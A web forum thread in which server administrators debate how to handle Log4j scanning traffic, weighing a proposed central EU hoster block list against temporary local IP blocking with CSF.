Hosters should block ASAP ip's and ip blocks that are used to scan on Log4j

I

ikkeben

Verified User
Joined
May 22, 2014
Messages
1,480
Location
Netherlands Germany
While for example

Wegen des extrem schnellen Wachstums spricht Checkpoint von einer "Cyber-Pandemie".
Click to expand...

And we all have problems, high CPU and more or worse also very much extra CLIMATE pollution CO2 by those.. :(
 
ikkeben said:
And we all have problems, high CPU and more
Click to expand...
We are?
Didn't notice it yet. We do have lots of scans for log4j. But it's almost undoable to block all those ip's. So many different ip's.
So best is to block only those who really are causing high load.
 
Richard G said:
We are?
Didn't notice it yet. We do have lots of scans for log4j. But it's almost undoable to block all those ip's. So many different ip's.
So best is to block only those who really are causing high load.
Click to expand...
Forumusers here ;)

Not we should block but the Hoster or main network infra structure level.

Yes so may IPS'so nice to have , while those could give a overview of hacked boxes and where what the hackers use, and then block them all.

Create a CENTRAL ban / block list for the Hosters ( stick their heads together) in EU very ASAP , and sweep whole the Network in EU much cleaner then

One time hell of a chance to get most of those ... in a quick clean sweep action, time now

So they stick their heads out now , then do take the one chance to cut of most of it from the web , so they must start over to get so much IP"S and hacked boxes while useless if all central blocked
 
Not the best idea as to innocent hosters or servers will be blocked that way too.
That's just why some of us are having troubles getting out of some spam systems, because they block ASN's.

I think the best solution is the same which is used for mail. Just block the ip's temporarily. We only need some entry to put in the regexp of CSF so it will detect and block it.
 
Richard G said:
I think the best solution is the same which is used for mail. Just block the ip's temporarily. We only need some entry to put in the regexp of CSF so it will detect and block it.
Click to expand...
Maybe local, yes but then still that "hacked boxes" are staying online and nothing changed about that, so there must be more to protect the WEB against this and other , for all if zero day those type of attacks should be blocked before .

While updates then often to late, where central blocking could prevent a lot more ?

ON ASN hmm is a bad blocking procedure.
 
You must log in or register to reply here.
Back
Top